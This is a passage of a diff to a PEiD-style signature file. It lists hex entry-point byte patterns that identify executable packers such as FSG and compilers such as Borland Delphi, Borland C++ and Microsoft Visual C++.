+signature = EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C# / Basic .NET)]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B3
+ep_only = true
+
+[FSG 1.31 -> dulek/xt]
+signature = BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? F6
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = EB 01 ?? EB 02 ?? ?? ?? 80 ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = E8 01 00 00 00 ?? ?? E8 ?? 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = EB 02 ?? ?? EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = ?? ?? EB ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE
+ep_only = true
+
+[Microsoft Visual C# / Basic .NET]
+signature = FF 25 00 20 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[MASM32]
+signature = 6A ?? 68 00 30 40 00 68 ?? 30 40 00 6A 00 E8 07 00 00 00 6A 00 E8 06 00 00 00 FF 25 08 20
+ep_only = true
+
+[Video-Lan-Client]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF
+ep_only = true
+
+[Exact Audio Copy]
+signature = E8 ?? ?? ?? 00 31 ED 55 89 E5 81 EC ?? 00 00 00 8D BD ?? FF FF FF B9 ?? 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE EB 02 CD 20 57 EB 02 CD 20 5A 88 10 EB 02 CD 20 40 E8 02 00 00 00 C5 62 5A 4E E8 01 00 00 00 43 5A 2B DB 3B F3 75 B1 C1 F3 0D 92 B8 DC 0C 4E 0D B7 F7 0A 39 F4 B5 ?? ?? 36 FF 45 D9 FA FB FE FD FE CD 6B FE 82 0D 28 F3 B6 A6 A0 71 1F BA 92 9C EE DA FE 0D 47 DB 09 AE DF E3 F6 50 E4 12 9E C8 EC FB 4D EA 77 C9 03 75 E0 D2 D6 E5 E2 8B 41 B6 41 FA 70 B0 A0 AB F9 B5 C0 BF ED 78 25 CB 96 E5 A8 A7 AA A0 DC 5F 73 9D 14 F0 B5 6A 87 B7 3B E5 6D 77 B2 45 8C B9 96 95 A0 DC A2 1E 9C 9B 11 93 08 83 9B F8 9E 0A 8E 10 F7 85
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland C++)]
+signature = C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F
+ep_only = true
+
+[Microsoft (R) Incremental Linker Version 5.12.8078 (MASM/TASM)->WinASM Studio]
+signature=6A 00 68 00 30 40 00 68 1E 30 40 00 6A 00 E8 0D 00 00 00 6A 00 E8 00 00 00 00 FF 25 00 20 40 00 FF 25 08 20 40
+ep_only = true
+
+[Borland Pascal v7.0 for Windows]
+signature = 9A FF FF 00 00 9A FF FF 00 00 55 89 E5 31 C0 9A FF FF 00 00
+ep_only = true
+
+[Borland C++ for Win32 1994]
+signature = A1 ?? ?? ?? ?? C1 ?? ?? A3 ?? ?? ?? ?? 83 ?? ?? ?? ?? 75 ?? 57 51 33 C0 BF
+ep_only = true
+
+[Borland C++ for Win32 1995]
+signature = A1 ?? ?? ?? ?? C1 ?? ?? A3 ?? ?? ?? ?? 57 51 33 C0 BF ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B CF 76
+ep_only = true
+
+[Borland C++ for Win32 1995]
+signature = A1 ?? ?? ?? ?? C1 ?? ?? A3 ?? ?? ?? ?? 83 ?? ?? ?? ?? 75 ?? 80 ?? ?? ?? ?? ?? ?? 74
+ep_only = true
+
+[Borland C++ for Win32 1999]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? C1 E0 02 A3 ?? ?? ?? ?? 52
+ep_only = true
+
+[Borland C++ for Win32 1999]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90
+ep_only = true
+
+[Borland C++]
+signature = A1 ?? ?? ?? ?? C1 E0 02 A3 ?? ?? ?? ?? 57 51 33 C0 BF ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B CF 76 05 2B CF FC F3 AA 59 5F
+ep_only = true
+
+[Borland C++ DLL]
+signature = A1 ?? ?? ?? ?? C1 E0 02 A3
+ep_only = true
+
+[Borland C++ DLL]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9
+ep_only = true
+
+[Borland C++ DLL]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 A1 C1 E0 02 A3 8B
+ep_only = true
+
+[Borland C++ DLL]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? C1 E0 02 A3 ?? ?? ?? ?? 8B
+ep_only = true
+
+[Borland Delphi vx.x (Component)]
+signature = C3 E9 ?? ?? ?? FF 8D 40
+ep_only = true
+
+[Borland Delphi DLL]
+signature = 55 8B EC 83 C4 B4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 40
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = 55 8B EC 83 C4 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Borland Delphi v2.0]
+signature = E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 0A ?? ?? ?? B8 ?? ?? ?? ?? C3
+ep_only = true
+
+[Borland Delphi v3.0]
+signature = 50 6A ?? E8 ?? ?? FF FF BA ?? ?? ?? ?? 52 89 05 ?? ?? ?? ?? 89 42 04 E8 ?? ?? ?? ?? 5A 58 E8 ?? ?? ?? ?? C3 55 8B EC 33 C0
+ep_only = true
+
+[Borland Delphi v3.0]
+signature = 55 8B EC 83 C4 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Borland Delphi v4.0 - v5.0]
+signature = 50 6A ?? E8 ?? ?? FF FF BA ?? ?? ?? ?? 52 89 05 ?? ?? ?? ?? 89 42 04 C7 42 08 ?? ?? ?? ?? C7 42 0C ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 58 E8 ?? ?? ?? ?? C3
+ep_only = true
+
+[Borland Delphi v4.0 - v5.0]
+signature = 55 8B EC 83 C4 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20
+ep_only = true
+
+[Borland Delphi v4.0 - v5.0]
+signature = 50 6A 00 E8 ?? ?? FF FF BA ?? ?? ?? ?? 52 89 05 ?? ?? ?? ?? 89 42 04 C7 42 08 00 00 00 00 C7 42 0C 00 00 00 00 E8 ?? ?? ?? ?? 5A 58 E8 ?? ?? ?? ?? C3
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = BA ?? ?? ?? ?? 83 7D 0C 01 75 ?? 50 52 C6 05 ?? ?? ?? ?? ?? 8B 4D 08 89 0D ?? ?? ?? ?? 89 4A 04
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = 53 8B D8 33 C0 A3 00 ?? ?? ?? 06 A0 0E 80 ?? ?? 0F FA 30 ?? ?? ?? 0A 10 ?? ?? ?? 0A 30 ?? ?? ?? 03 3C 0A 30 ?? ?? ?? 03 3C 0A 30 ?? ?? ?? E8
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 ?? ?? FB FF A1 ?? ?? ?? ?? 8B ?? E8 ?? ?? FF FF 8B 0D ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 8B 15 ?? ?? ?? ?? E8 ?? ?? FF FF A1 ?? ?? ?? ?? 8B ?? E8 ?? ?? FF FF E8 ?? ?? FB FF 8D 40
+ep_only = true
+
+[Borland Delphi v5.0 KOL/MCK]
+signature = 55 8B EC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? 00 00 00
+ep_only = true
+
+[Borland Delphi v5.0 KOL]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? 40 00 E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF 8B C0 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Borland Delphi v6.0]
+signature = 53 8B D8 33 C0 A3 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? FF A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? E8
+ep_only = true
+
+[Borland Delphi v6.0]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? 45 00 E8 ?? ?? ?? FF A1 ?? ?? 45 00 8B 00 E8 ?? ?? FF FF 8B 0D
+ep_only = true
+
+[Borland Delphi v6.0 KOL]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? 40 00 E8 ?? ?? FF FF A1 ?? 72 40 00 33 D2 E8 ?? ?? FF FF A1 ?? 72 40 00 8B 00 83 C0 14 E8 ?? ?? FF FF E8 ?? ?? FF FF
+ep_only = true
+
+[Borland Delphi Setup Module]
+signature = 55 8B EC 83 C4 ?? 53 56 57 33 C0 89 45 F0 89 45 D4 89 45 D0 E8
+ep_only = true
+
+[Borland Delphi]
+signature = 55 8B EC 83 C4 F4
+ep_only = true
+
+[Borland Delphi (Component)]
+signature = C3 E9 ?? ?? ?? FF 8D 40
+ep_only = true
+
+[Cygwin32]
+signature = 55 89 E5 83 EC 04 83 3D
+ep_only = true
+
+[FASM v1.3x]
+signature = 6A ?? FF 15 ?? ?? ?? ?? A3
+ep_only = true
+
+[Free Pascal v0.99.10]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 00 6E 00 00 55 89 E5 8B 7D 0C 8B 75 08 89 F8 8B 5D 10 29
+ep_only = true
+
+[LCC Win32 v1.x]
+signature = 64 A1 ?? ?? ?? ?? 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 ?? 50
+ep_only = true
+
+[LCC Win32 DLL]
+signature = 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 ?? ?? ?? FF 75 10 FF 75 0C FF 75 08 A1
+ep_only = true
+
+[Microsoft Visual C++]
+signature = 8B 44 24 08 56 83 E8 ?? 74 ?? 48 75
+ep_only = true
+
+[Microsoft Visual C++]
+signature = 8B 44 24 08 83 ?? ?? 74
+ep_only = true
+
+[Microsoft Visual C v2.0]
+signature = 53 56 57 BB ?? ?? ?? ?? 8B ?? ?? ?? 55 3B FB 75
+ep_only = true
+
+[Microsoft Visual C++ vx.x]
+signature = 55 8B EC 56 57 BF ?? ?? ?? ?? 8B ?? ?? 3B F7 0F
+ep_only = true
+
+[Microsoft Visual C++ vx.x]
+signature = 53 55 56 8B ?? ?? ?? 85 F6 57 B8 ?? ?? ?? ?? 75 ?? 8B ?? ?? ?? ?? ?? 85 C9 75 ?? 33 C0 5F 5E 5D 5B C2
+ep_only = true
+
+[Microsoft Visual C++ v4.x]
+signature = 64 A1 00 00 00 00 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 64 89 25 00 00 00 00 83 EC ?? 53 56 57
+ep_only = true
+
+[Microsoft Visual C++ v4.2]
+signature = 64 A1 00 00 00 00 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 64 ?? ?? ?? ?? ?? ?? 83 ?? ?? 53 56 57 89 ?? ?? FF
+ep_only = true
+
+[Microsoft Visual C++ v4.2]
+signature = 64 A1 00 00 00 00 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 64 ?? ?? ?? ?? ?? ?? 83 ?? ?? 53 56 57 89 ?? ?? C7
+ep_only = true
+
+[Microsoft Visual C++ v4.2 DLL]
+signature = 53 B8 ?? ?? ?? ?? 8B ?? ?? ?? 56 57 85 DB 55 75
+ep_only = true
+
+[Microsoft Visual C++ v5.0]
+signature = 55 8B EC 6A FF 68 68 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 53 56 57
+ep_only = true
+
+[Microsoft Visual C++ v5.0 DLL]
+signature =  ?? ?? 24 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 8B ?? 24 0C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D
+ep_only = true
+
+[Microsoft Visual C++ v5.0/v6.0 (MFC)]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50
+ep_only = true
+
+[Microsoft Visual C++ vx.x]
+signature = 55 8B EC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? 83 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Microsoft Visual C++ vx.x DLL]
+signature = ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? 00 ?? 00
+ep_only = true
+
+[Microsoft Visual C++ v6.0 SPx]
+signature = 55 8B EC 83 EC 44 56 FF 15 ?? ?? ?? ?? 8B F0 8A ?? 3C 22
+ep_only = true
+
+[Microsoft Visual C++ v6.0 SPx]
